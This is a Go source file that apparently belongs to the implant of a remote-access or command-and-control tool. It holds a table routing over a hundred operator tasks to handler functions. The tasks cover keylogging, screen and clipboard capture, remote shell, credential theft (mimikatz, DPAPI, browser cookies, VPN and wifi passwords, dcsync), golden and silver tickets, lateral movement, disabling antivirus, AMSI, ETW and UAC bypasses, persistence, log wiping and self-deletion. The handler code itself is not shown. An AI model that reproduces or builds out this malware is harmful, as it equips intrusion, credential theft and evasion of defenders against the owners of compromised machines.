//go:build linux || windows || darwin
// +build linux windows darwin

package main

// taskHandler processes an agent task and populates the result.
type taskHandler func(Task, *TaskResult)

// taskHandlers maps task type strings to their handler functions.
var taskHandlers = map[string]taskHandler{}

func init() {
	taskHandlers = map[string]taskHandler{
		"shell":                     handleShell,
		"screenshot":                handleScreenshot,
		"screen_stream_start":       handleScreenStreamStart,
		"screen_stream_stop":        handleScreenStreamStop,
		"keylogger_start":           handleKeyloggerStart,
		"keylogger_stop":            handleKeyloggerStop,
		"keylogger_dump":            handleKeyloggerDump,
		"ps":                        handlePS,
		"suspend":                   handleSuspend,
		"resume":                    handleResume,
		"killproc":                  handleKillProc,
		"clipboard_get":             handleClipboardGet,
		"clipboard_set":             handleClipboardSet,
		"find":                      handleFind,
		"reg_get":                   handleRegGet,
		"reg_set":                   handleRegSet,
		"reg_delete":                handleRegDelete,
		"reboot":                    handleReboot,
		"shutdown":                  handleShutdown,
		"drives":                    handleDrives,
		"beacon_now":                handleBeaconNow,
		"services":                  handleServices,
		"portscan":                  handlePortscan,
		"netstat":                   handleNetstat,
		"users":                     handleUsers,
		"av":                        handleAV,
		"download_url":              handleDownloadURL,
		"uninstall":                 handleUninstall,
		"set_sleep":                 handleSetSleep,
		"creds":                     handleCreds,
		"inject":                    handleInject,
		"inject_methods":            handleInjectMethods,
		"list_inject_methods":       handleInjectMethods,
		"spawn":                     handleSpawn,
		"shinject":                  handleShinject,
		"shspawn":                   handleShspawn,
		"lateral":                   handleLateral,
		"lateral_wmi":              handleLateralWMI,
		"lateral_winrm":            handleLateralWinRM,
		"lateral_psexec":           handleLateralPsexec,
		"lateral_dcom":             handleLateralDCOM,
		"lateral_scf":              handleLateralSCF,
		"lateral_list":             handleLateralList,
		"net_scan_smb":             handleNetScanSMB,
		"net_enum_hosts":           handleNetEnumHosts,
		"socks":                     handleSocks,
		"kill_av":                   handleKillAV,
		"elevate":                   handleElevate,
		"bof":                       handleBOF,
		"elevate_printnightmare":    handleElevatePrintNightmare,
		"execute_assembly":          handleExecuteAssembly,
		"kerberoast":                handleKerberoast,
		"mimikatz":                  handleMimikatz,
		"dpapi_masterkey":           handleDPAPIMasterKey,
		"dpapi_blob":                handleDPAPIBlob,
		"dpapi_browser":             handleDPAPIBrowser,
		"lsa_bypass":                handleLSABypass,
		"adcs_find":                 handleADCSFind,
		"adcs_request":              handleADCSRequest,
		"shadow_creds":              handleShadowCreds,
		"ldap_users":                handleLDAPUsers,
		"ldap_groups":               handleLDAPGroups,
		"ldap_computers":            handleLDAPComputers,
		"ldap_spn":                  handleLDAPSPN,
		"ldap_acl":                  handleLDAPACL,
		"ldap_query":                handleLDAPQuery,
		"screenshot_window":         handleScreenshotWindow,
		"ls":                        handleLS,
		"delete":                    handleDelete,
		"read":                      handleRead,
		"download":                  handleDownload,
		"upload":                    handleUpload,
		"net":                       handleNet,
		"powerpick":                 handlePowerPick,
		"peloader":                  handlePELoader,
		"execute_assembly_forkrun":  handleExecuteAssemblyForkRun,
		"rportfwd_start":            handleRPortFwdStart,
		"rportfwd_stop":             handleRPortFwdStop,
		"dcsync":                    handleDCSync,
		"golden_ticket":             handleGoldenTicket,
		"silver_ticket":             handleSilverTicket,
		"asreproast":                handleASREPRoast,
		"pass_the_hash":             handlePassTheHash,
		"pass_the_ticket":           handlePassTheTicket,
		"persistence_add":           handlePersistenceAdd,
		"persistence_list":          handlePersistenceList,
		"persistence_remove":        handlePersistenceRemove,
		"browser_steal":             handleBrowserSteal,
		"cookie_export":             handleCookieExport,
		"vpn_creds":                 handleVpnCreds,
		"wifi_creds":                handleWifiCreds,
		"privesc_check":             handlePrivescCheck,
		"remote_input":              handleRemoteInput,
		"uac_bypass":                handleUACBypass,
		"amsi_bypass":               handleAMSIByPass,
		"etw_bypass":                handleETWByPass,
		"etw_ntrace_bypass":         handleETWNtraceBypass,
		"amsi_session_bypass":       handleAMSISessionBypass,
		"blockdlls":                 handleBlockDLLs,
		"unhook_ntdll":              handleUnhookNtdll,
		"protect_process":           handleProtectProcess,
		"cleanup":                   handleCleanup,
		"log_wipe":                  handleLogWipe,
		"track_wipe":                handleTrackWipe,
		"self_delete":               handleSelfDelete,
		"kill":                      handleKill,
		"self_update":               handleSelfUpdate,
		"token_list_procs":          handleTokenListProcs,
		"token_steal":               handleTokenSteal,
		"token_make":                handleTokenMake,
		"token_revert":              handleTokenRevert,
		"rev2self":                  handleTokenRevert,
		"token_whoami":              handleTokenWhoami,
		"fodhelper":                 handleFodhelper,
		"slui":                      handleSluiUAC,
		"eventvwr":                  handleEventvwrUAC,
		"computerdefaults":          handleComputerDefaultsUAC,
	}
}
